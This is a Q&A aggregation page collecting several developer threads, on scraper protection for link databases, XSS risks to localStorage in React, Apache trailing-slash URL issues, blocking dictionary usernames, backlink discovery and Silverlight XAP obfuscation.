Whats a good way to protect a link database from automatic scrapers? - screen-scraping

I have a large link database, that I would want to protect against others who would want to copy them. Is there anything I can do other than force people to enter a CAPTCHA before each link?

you can output the links using ROT13, and then use javascript to put them back to normal.
this way, the scrapers must support javascript in order to steal your links, which should cut down on the number of eligible scrapers
bonus points: replace ROT13 with something harder, and obfuscate your 'decode' javascript.

The javascript suggestion could work, but you would render your page inaccessible to those using assistive technologies like screen readers as well as anyone without javascript.
Another possible option would be to generate a cryptographic nonce. This technique is currently used to protect against CSRF attacks, but could also be used to ensure that the scraper would have to request a page from your site before accessing a link. This approach may not be appropriate if you support hotlinking, but if you just want to make sure that someone went to your site first, it could work.
Another somewhat ghetto option would be use referrers. These can be easily faked, but it might prevent some of the dumber scrapers. This also requires that you know where your users came from before they hit your site.
Can you let us know if you are hotlinking or if the user comes to your site before going to the protected link? We might be able to provide better advice that way.

Related

How a hacker can perform an xss attack if he does not have access to the user computer? [duplicate]

This question already has answers here:
What does it mean when they say React is XSS protected?
(2 answers)
Closed 2 years ago.
I am reading some articles about security in React applications. Indeed, I use localstorage to store the user's infos and I've seen that an xss attack could easily allow a hacker to steal them.
However, I understand that in React, an xss attack can only be performed through a setDangerouslyInnerHtml tag that displays a content written in an input. This way, you can steal his infos, cookies session, ect. and send them to your website.
But a hacker could only do this if he has the chance to write his script on the user's computer right? So, if I don't use any setDangerouslyInnerHtml tag, is the localstorage safe in a React app? If not, how a hacker could run such an attack on the website?
If the user uses a public computer it might be possible.
If you have some functionality which allows external users to post content on your site, for example comments or reactions then someone might write a script which sends localstorage data to a hacker.
There are a lot of ways to exploit this, check owasp for more detailed explanation.
https://owasp.org/www-project-top-ten/
Developers must accept what attackers can do:
They can retheme an entire site,
They can too make "bot" scripts to automate tasks and in other words flood your server if that was the task.
All limits defined in JS/HTML can and will be bypassed, (e.g: character lengths in forms/etc)
The entire page can be re-written to not talk to your server-right, in other words crashing it and more if not handled/detected.
The list goes on but accept it's pretty much all off the table if someone wants to pry hard enough.
There's not a whole lot you can do to prevent this, to explain! You can add an external script from randomxyxsite.com and though trusted could under-go an attack where that script now runs "loggers or some type of analytic grabbing bot", this in my opinion is easily avoided by not adding external scripts if you can.
Though I said what I said originally, here's where you're stuck...
Any user can open console/build extensions or use a third-party loader like Tampermonkey and other alternatives and execute script at their will. This too can become "shared" and comparable to botnet behavior.
So what can you do to stop clients from mis-behaving or "super-modding" their content for malicious server-use?
Some ways to safe-guard:
Server-sided requests should pass through some form of check/sanitization to ensure that whatever any of the clients pass-to it is absolutely safe to absorb.
Never let the user tell you who they beyond login, define these users by sessionid; know these users by their session and when user<>user, get between them and follow the above point.
Keep as much as possible private. Public variables/classes/functions are easily re-written during run-time leaving some features you maybe intended on to fall apart.
window.PayFeature = function(){};
ALLOW XSS:
If feared, a developer should study it more. As much as a user can distort/change their end it's only an issue if the traffic changes or the data received from them starts becoming attack like. So for a developer your best bet is to actually rate-limit, set rules and more for users so that abuse is detected and stopped. As long as you do that, you should never fear it but welcome it, when server is secured it becomes a matter of spam (potential botnet)

Apache hashbang url problems

I set up an older Rails 2 project on a brand new Apache#Debian#squeeze. The project itself could be a single pager, using links to scroll page up and down. My links look like that:
http://mydomain.com/en/#home
These links do fine as long as JavaScript intercepts the click event and simply scrolls to the intended section. In case the user leaves the single page and opens one where these links (still the same) cannot be followed via JavaScript, I only receive an:
Forbidden
You don't have permission to access /en/ on this server.
If I change the link to:
http://mydomain.com/en#home
everything works fine and as expected. But I do not want to change my link structure. It already worked well at an older Debian5 box.
I expect that to be an Apache2 configuration issue, but do not find anything useful in the net.
Looking forward to any kind of enlightenment.
Thx
Felix
I don't know how or where you are working with javascript related to this problem, but let me tell you this.
Everything after the hashtag # is never passed to the server. Its HTTP standardization, it is just not passed to the server.
It is only intended to navigate to anchor within the webpage, and today used for a lot of new techniques including, but not limited to, xss scripting, javascript hooks, etc
It is possible that links are prohibited to load with an onclick event and some javascript does something instead, but it is not possible that you end up on this page http://mydomain.com/en/#home if http://mydomain.com/en/ does not work.
However to solve your problem you probably have to adjust your your apache rewriting rule (or enable mod_rewrite at all?) to also capture links with trailing slashes.
The link http://mydomain.com/en/ http://mydomain.com/en is something different and could serve a completely different page.
I would strongly recommend not to get a mess here and do a strict permanent redirect from one to the other. Which you choose for primary usage is up to you.
I prefer a trailing slash and can also supply arguments for that, but they can be invalidated easily and replaced by some to suggest the opposite. You should find plenty on discussion on that if you search for trailing slash here.
To solve your problem please try to find the according RewriteRule, copy it and add it one more time with a trailing slash. See whether it works and make a redirect to the url without trailign slash.
You may also edit your answer and post your server config to get help with that.

Preventing dictionary user names for registration

When I was setting up an account with gmail few years back (probably this is still a case, haven't check) I've noticed that system doesn't allow to register common terms, nouns as username, it seemed that it used a sort of dictionary for screening. I would like to implement similar feature in my app, anyone have idea how to tackle this? App is written in PHP but understand I'll have to hook it up with online service.
Thanks
Wordpress MU has such feature too, you fill a list of possible usernames that you want to avoid and they become unavailable for users. You can check its source to get their approach...
Sinan.
Well the API will vary from service to service so I'd suggest you find one, look at their developer docs and then if you have a question ask it here.

Best Way to automatically find links to your content?

So, here is the task I've found myself thinking of. Pretend for a moment, that I have a large body of content. I want to see what websites are linking to my content. I know that I could look into TrackBack or PingBack but what about those that aren't using tools capable of dealing with that?
It would seem that some form of Web Crawler that looks for pages linking to the original document might be useful. My question to the greater community is what would be the best way to get started here? Do TrackBack and PingBack do more than I assume? Are there services or tools out there that already do what I'm thinking?
Google is your friend!
Use the link prefix:
link:whatsite.com
And yes, trackbacks do more.
If you have HTTP referers setup in your logs, you can mine them.
You can even discover pages taht does not know about.
Else, there is the paying Linkscape from Seomoz or the free majesticSEO (if you confirm ownership of the domain).
MajesticSEO has a bigger backlink index and an API (need to login!).

Obfuscating Silverlight XAP

I am wondering any efficient way to hide our Silverlight code. I know there are some obfuscators available but it looks like people can hack that too. Anybody have any success on this front?
Pragma No-Cache on the page hosting the silverlight application will prevent the the browser from caching the xap, instead it will read it by streaming from the web server. That will make it harder for peeps to get the xap. Obfuscation will make it harder still.
Also make sure the app is hosted in https, have authentication take place outside the main application. This way the xap stream is encoded on the way down.
You really can't hide anything that gets transmitted to the client. If people want to figure it out, they will.
You need to put any proprietary code in your back-end where client machines can't get at it.
No. The client browser must be able to read the code, therefore it is hackable.
Here is a short article on how to obfuscate a xap file
http://www.rudigrobler.net/Blog/obfuscating-silverlight
You could complicate the potential hacker's job by downloading obfuscated fragments of your app during execution, using MEF for instance. Needless to say that it's interesting if your application is big enough so that this astuce speed up startup time rather than hindering the user's experience.
It won't prevent a valorous hacker from getting your code (in the hand no method can prevent this, as the Silverlight plugin must be able to execute it), but the astuce will complicate his task greatly.
preventing the browser from caching the XAP is useless, like using HTTPS, as it's far easier for the attacker to use something as complicated as firebug to get the XAP than looking for it in the browser cache or using a Man in the Middle Attack.
I imagine that if you had lot of motivation, you could:
obfuscate every assemblies
use dynamic loaded XAPs
encrypt the dynamic loaded XAP serverside and decrypt it client side using a dynamicly generated key sent by a webservice (Not in the same request. And don't reuse the key.)
It won't prevent the attacker from getting your code, but he will have to analyse your initial (obfuscated) xap to understand the decryption code, get the key, get the encrypted (obfuscated too) dynamic loaded XAP, decrypt it, then manage to unobfuscate it, then understand how it plugs itself in the application.
It's not the same as using HTTPS, because here the encryption and decryption process is done in the application so that tools like firebug or fiddler become useless.
Hem. Nothing can prevent anyone from reading your code. BUT you can make it not worth his time. You don't have to use all the ideas here and I am sure that you can find others, but make sure that implementing such measures are worth your time too.
Either way, it was rather funny to write this :p
You cannot hide (at least not non-trivially) XAP files. But you can obfuscate them. Obfuscation is not a definitive answer, but its a start and can give pretty good protection.

Resources